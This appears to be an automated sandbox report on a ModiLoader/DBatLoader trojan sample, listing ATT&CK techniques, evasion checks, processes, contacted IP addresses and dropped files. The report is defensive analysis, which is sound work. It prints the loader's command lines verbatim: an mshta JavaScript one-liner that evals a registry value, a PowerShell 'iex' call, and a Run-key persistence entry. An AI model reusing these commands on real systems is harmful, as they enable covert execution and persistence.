Malware Analysis Report

2024-08-06 14:28

Sample ID 240525-r1w1eaga5y
Target 724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118
SHA256 1cf92e2ce41fd1ba467d1cb53b7b66023bf0bc37b27a4cefcbe14019f45f6167
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1cf92e2ce41fd1ba467d1cb53b7b66023bf0bc37b27a4cefcbe14019f45f6167

Threat Level: Known bad

The file 724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Process spawned unexpected child process

Looks for VirtualBox Guest Additions in registry

Checks for common network interception software

Looks for VirtualBox drivers on disk

ModiLoader Second Stage

Looks for VMWare Tools registry key

Checks BIOS information in registry

Deletes itself

Checks computer location settings

Adds Run key to start application

Maps connected drives based on registry

Drops file in System32 directory

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Virtualization/Sandbox Evasion
T1497
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Software Discovery
T1518
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
File and Directory Discovery
T1083
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-25 14:40

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 14:40

Reported

2024-05-25 15:13

Platform

win7-20231129-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d866a3c3\\2abf568c.bat\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2648 set thread context of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 set thread context of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\a3267dda\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:nZdK9g2GV=\"u\";sJ9=new ActiveXObject(\"WScript.Shell\");vz15nWuNJ=\"J\";uSaM4=sJ9.RegRead(\"HKCU\\\\software\\\\hsgrudze\\\\zdxvakv\");Q3M6if=\"DUNKO\";eval(uSaM4);rlUa5J=\"so2Feu\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.5ad3c886b C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.5ad3c886b\ = "a3267dda" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\a3267dda C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\a3267dda\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\a3267dda\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\a3267dda\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2984 wrote to memory of 2648 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2984 wrote to memory of 2648 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2984 wrote to memory of 2648 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2984 wrote to memory of 2648 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2648 wrote to memory of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2648 wrote to memory of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2648 wrote to memory of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2648 wrote to memory of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2648 wrote to memory of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2648 wrote to memory of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2648 wrote to memory of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2648 wrote to memory of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 wrote to memory of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 wrote to memory of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 wrote to memory of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 wrote to memory of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 wrote to memory of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 wrote to memory of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 wrote to memory of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 wrote to memory of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:AK3hyn="b";m31w=new%20ActiveXObject("WScript.Shell");Jxu8RXuz="Rtij";xQ75zg=m31w.RegRead("HKCU\\software\\6kqUkUFa\\4BSKlMSrW7");t5VlXPF4i="Q";eval(xQ75zg);gZk9A="d";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ydmjrc

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
JP 114.172.101.199:80 tcp
US 204.52.121.17:80 tcp
US 130.29.105.124:443 tcp
AU 203.7.222.209:443 tcp
US 57.156.189.239:443 tcp
TR 178.245.143.188:80 tcp
US 34.31.210.118:443 tcp
US 4.37.71.133:443 tcp
US 167.218.71.97:80 tcp
HK 210.177.88.106:443 tcp
KR 210.125.162.70:8080 tcp
ID 110.239.86.106:443 tcp
US 172.11.106.197:443 tcp
US 184.143.185.61:80 tcp
CO 179.14.237.130:80 tcp
MX 189.226.104.155:80 tcp
CN 117.171.127.22:80 tcp
GB 25.226.106.70:443 tcp
IT 91.254.110.199:443 tcp
PL 91.123.190.102:443 tcp
US 3.194.28.20:8080 tcp
US 166.112.160.202:443 tcp
N/A 10.80.125.78:80 tcp
US 26.160.49.194:80 tcp
DE 53.153.144.53:8080 tcp
US 129.6.152.27:443 tcp
NO 160.68.168.243:443 tcp
US 204.4.128.247:443 tcp
CN 182.120.203.139:80 tcp
US 169.155.182.172:8080 tcp
IR 2.181.52.52:80 tcp
NO 144.164.212.2:8080 tcp
N/A 100.72.126.87:80 tcp
US 135.32.125.185:443 tcp
CN 125.211.137.71:80 tcp
GB 195.157.215.65:80 tcp
JP 153.153.252.206:443 tcp
US 29.54.111.216:443 tcp
IT 2.37.11.100:80 tcp
DE 53.226.124.213:80 tcp
US 146.229.56.62:443 tcp
US 137.20.77.57:80 tcp
US 96.138.71.173:80 tcp
BR 152.243.152.158:80 tcp
US 68.61.55.48:80 tcp
GB 149.194.187.3:80 tcp
KR 222.232.224.162:443 tcp
US 66.205.188.73:443 tcp
JP 60.112.75.168:80 tcp
US 12.28.92.208:8080 tcp
ES 62.43.57.215:80 tcp
BR 181.218.233.113:443 tcp
JP 219.97.163.159:80 tcp
NZ 219.89.255.189:443 tcp
DE 53.248.33.70:80 tcp
SI 86.61.25.209:80 tcp
US 9.76.225.2:80 tcp
SI 149.62.74.224:80 tcp
RU 95.78.231.96:80 tcp
JP 180.19.198.211:443 tcp
NL 92.64.151.51:8080 tcp
MY 124.13.182.82:443 tcp
N/A 10.210.237.9:8080 tcp
JP 202.26.246.4:80 tcp
US 170.222.194.238:8080 tcp
US 72.160.63.2:443 tcp
EG 217.54.8.250:443 tcp
US 26.220.190.12:443 tcp
US 204.192.134.68:80 tcp
FR 86.70.203.226:80 tcp
TN 102.108.47.64:443 tcp
DE 84.171.250.13:80 tcp
US 55.14.37.170:443 tcp
US 9.39.219.49:443 tcp
US 96.166.220.191:8080 tcp
KR 14.53.140.167:80 tcp
EG 105.90.45.150:80 tcp
US 20.3.209.124:80 tcp
US 216.92.91.141:443 tcp
US 50.155.48.155:443 tcp
DE 94.186.196.34:443 tcp
TW 210.202.53.225:443 tcp
IN 157.45.178.129:443 tcp
US 17.44.83.111:443 tcp
US 75.182.128.174:443 tcp
JP 153.185.200.89:80 tcp
RU 92.101.251.243:443 tcp
HU 91.104.159.152:443 tcp
KW 78.89.52.64:80 tcp
US 67.7.98.122:443 tcp
FI 130.231.84.175:80 tcp
US 63.38.112.127:443 tcp
AU 119.18.35.115:80 tcp
US 64.129.241.16:443 tcp
FR 213.90.231.232:443 tcp
CZ 147.33.153.16:80 tcp
US 157.210.251.237:443 tcp
US 198.90.242.198:443 tcp
CN 101.5.31.58:443 tcp
CN 222.38.182.23:80 tcp
US 75.54.21.201:443 tcp
IR 5.116.60.32:80 tcp
US 48.126.180.81:8080 tcp
US 135.16.40.10:80 tcp
FR 45.9.199.102:443 tcp
MA 105.132.206.56:80 tcp
FI 195.255.200.6:443 tcp
KR 220.87.220.135:80 tcp
CA 24.77.191.36:80 tcp
US 64.233.108.41:443 tcp
CA 142.124.85.2:443 tcp
CN 58.39.60.119:80 tcp
CN 182.245.151.209:443 tcp
CN 211.144.23.97:443 tcp
GB 145.227.124.168:8080 tcp
CN 61.187.229.183:443 tcp
CN 120.136.130.132:80 tcp
US 162.110.83.202:8080 tcp
VN 14.239.229.249:80 tcp
US 199.169.226.102:80 tcp
US 47.206.215.27:443 tcp
MX 189.242.90.29:8080 tcp
JP 120.89.253.200:80 tcp
CN 42.236.212.23:443 tcp
US 74.122.18.72:80 tcp
US 206.254.28.81:80 tcp
BR 191.200.185.49:80 tcp
US 71.198.53.226:80 tcp
NL 145.15.211.25:80 tcp
ZA 45.149.227.216:80 tcp
GB 81.78.18.248:8080 tcp
FR 77.154.136.67:80 tcp
US 215.252.59.116:80 tcp
FR 176.153.177.205:80 tcp
US 140.176.5.57:443 tcp
PH 110.55.149.18:80 tcp
AU 148.182.156.209:443 tcp
US 172.106.228.221:80 tcp
GB 86.3.36.136:443 tcp
DE 94.115.152.53:80 tcp
US 98.160.9.53:80 tcp
CN 120.227.19.75:80 tcp
JP 210.152.101.173:80 tcp
JP 219.42.178.251:80 tcp
US 206.203.189.207:80 tcp
CA 173.33.109.50:8080 tcp
VE 190.201.6.41:443 tcp
US 75.44.51.59:80 tcp
US 32.250.149.169:80 tcp
ID 122.129.100.106:80 tcp
US 154.36.205.134:80 tcp
US 154.36.205.134:80 154.36.205.134 tcp
US 16.103.31.233:80 tcp
HR 46.234.94.6:80 tcp
US 7.139.41.182:80 tcp
JP 122.131.94.4:80 tcp
US 129.106.137.120:80 tcp
SG 155.69.95.42:443 tcp
US 72.149.14.156:80 tcp
BR 187.121.23.188:80 tcp
US 26.210.197.25:80 tcp
RU 5.145.188.62:80 tcp
US 55.45.156.158:8080 tcp
DE 18.199.80.79:80 tcp
KW 37.37.154.124:80 tcp
MX 189.214.150.96:80 tcp
US 174.204.117.234:443 tcp
US 55.78.253.244:443 tcp
US 17.138.159.166:80 tcp
DE 37.83.144.50:80 tcp
VE 150.189.93.130:80 tcp
US 30.143.33.98:80 tcp
US 26.76.215.6:80 tcp
BG 77.85.210.209:8080 tcp
US 17.207.173.80:80 tcp
TW 116.241.248.99:80 tcp
EG 154.191.145.121:443 tcp
GB 25.177.26.225:80 tcp
ID 39.251.165.127:80 tcp
HK 113.212.224.54:443 tcp
AR 181.1.159.34:443 tcp
FR 92.245.139.6:80 tcp
DE 79.222.184.178:8080 tcp
US 97.40.71.24:80 tcp
US 24.117.124.219:80 tcp
SE 91.95.120.63:443 tcp
US 157.183.229.104:80 tcp
CN 203.166.171.23:443 tcp
US 104.225.162.10:80 tcp
US 15.221.68.136:80 tcp
CN 123.161.41.71:8080 tcp
US 24.210.233.38:80 tcp
PL 83.14.13.85:80 tcp
US 68.14.233.94:443 tcp
JP 27.136.96.82:80 tcp
LT 94.244.67.116:80 tcp
IT 195.120.253.149:80 tcp
US 50.127.188.23:80 tcp
US 67.172.250.96:8080 tcp
US 99.182.160.82:443 tcp
FR 134.212.32.201:80 tcp
US 15.84.224.87:443 tcp
N/A 127.189.42.236:443 tcp
US 128.128.142.17:443 tcp
US 44.12.132.237:80 tcp
DE 134.28.135.203:80 tcp
RU 31.132.155.197:80 tcp
CN 42.211.149.21:443 tcp
US 65.232.35.75:80 tcp
AT 178.191.97.234:8080 tcp
DE 188.193.94.8:443 tcp
KR 121.169.59.211:443 tcp
US 63.5.210.160:443 tcp
GB 47.66.234.137:443 tcp
US 38.221.122.127:80 tcp
JP 220.23.150.238:80 tcp
US 100.53.27.21:80 tcp
JP 202.250.161.211:80 tcp
MX 189.186.7.213:80 tcp
US 9.158.121.201:80 tcp
US 73.146.117.69:443 tcp
DE 94.115.59.147:80 tcp
IT 151.100.194.198:443 tcp
IN 223.231.93.19:80 tcp
JP 113.36.117.87:80 tcp
US 164.83.253.199:443 tcp
US 65.196.153.186:80 tcp
US 74.77.255.175:80 tcp
JP 219.210.113.33:443 tcp
CH 162.64.148.65:80 tcp
US 69.175.200.106:80 tcp
NL 84.205.74.79:80 tcp
FR 78.196.74.109:443 tcp
CN 139.148.181.135:80 tcp
US 47.20.31.185:443 tcp
US 132.36.135.7:80 tcp
CN 116.237.105.129:8080 tcp
JP 163.144.253.246:80 tcp
EG 105.201.27.98:80 tcp
BR 45.165.142.76:80 tcp
FI 85.134.56.133:80 tcp
CN 210.41.22.109:80 tcp

Files

memory/2368-1-0x0000000000457000-0x0000000000459000-memory.dmp

memory/2368-0-0x0000000000400000-0x0000000000460710-memory.dmp

memory/2368-2-0x0000000000320000-0x00000000003FC000-memory.dmp

memory/2368-6-0x0000000000320000-0x00000000003FC000-memory.dmp

memory/2368-5-0x0000000000320000-0x00000000003FC000-memory.dmp

memory/2368-4-0x0000000000320000-0x00000000003FC000-memory.dmp

memory/2368-3-0x0000000000320000-0x00000000003FC000-memory.dmp

memory/2368-7-0x0000000000320000-0x00000000003FC000-memory.dmp

memory/2368-8-0x0000000000400000-0x0000000000460710-memory.dmp

memory/2368-9-0x0000000000320000-0x00000000003FC000-memory.dmp

memory/2648-13-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

memory/2648-14-0x00000000060F0000-0x00000000061CC000-memory.dmp

memory/2672-15-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-16-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2648-18-0x00000000060F0000-0x00000000061CC000-memory.dmp

memory/2672-32-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-33-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-46-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-47-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-41-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-40-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-38-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-37-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-36-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-35-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-34-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-31-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2368-49-0x0000000000320000-0x00000000003FC000-memory.dmp

memory/2672-30-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-29-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-28-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-27-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-26-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-25-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-48-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-39-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-23-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-22-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-58-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-57-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-56-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-55-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-21-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-20-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-19-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2672-24-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-61-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-65-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-67-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-73-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-64-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-72-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-71-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-69-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-68-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-66-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-63-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-62-0x0000000000210000-0x000000000035A000-memory.dmp

memory/2804-70-0x0000000000210000-0x000000000035A000-memory.dmp

C:\Users\Admin\AppData\Local\d866a3c3\1ac3c0ce.5ad3c886b

MD5 b28d6b63bcc68fddb33cd9512e790208
SHA1 d7df52970f862d37e254dd57c479afc0220ec777
SHA256 e2f4a902968027e27ded59a3adad608c67db0e352d0031cdc8c6ce06caa0edc6
SHA512 11ad8d9036eac459d8d94a9cc3b871c5dbf290ca52880785ed64747f5bd06379869baa148fd4c1ecb215881b98242c21817f40829383250cc83a828d404f3732

C:\Users\Admin\AppData\Local\d866a3c3\2abf568c.bat

MD5 37e7abf643837ff38212a6e350f5e027
SHA1 f76cc289acac6477d66e199545b7042cb137997e
SHA256 0013f40c559da60a2b9d1f617c0788980e002d9038590a35ebc18f3fd3afc1ac
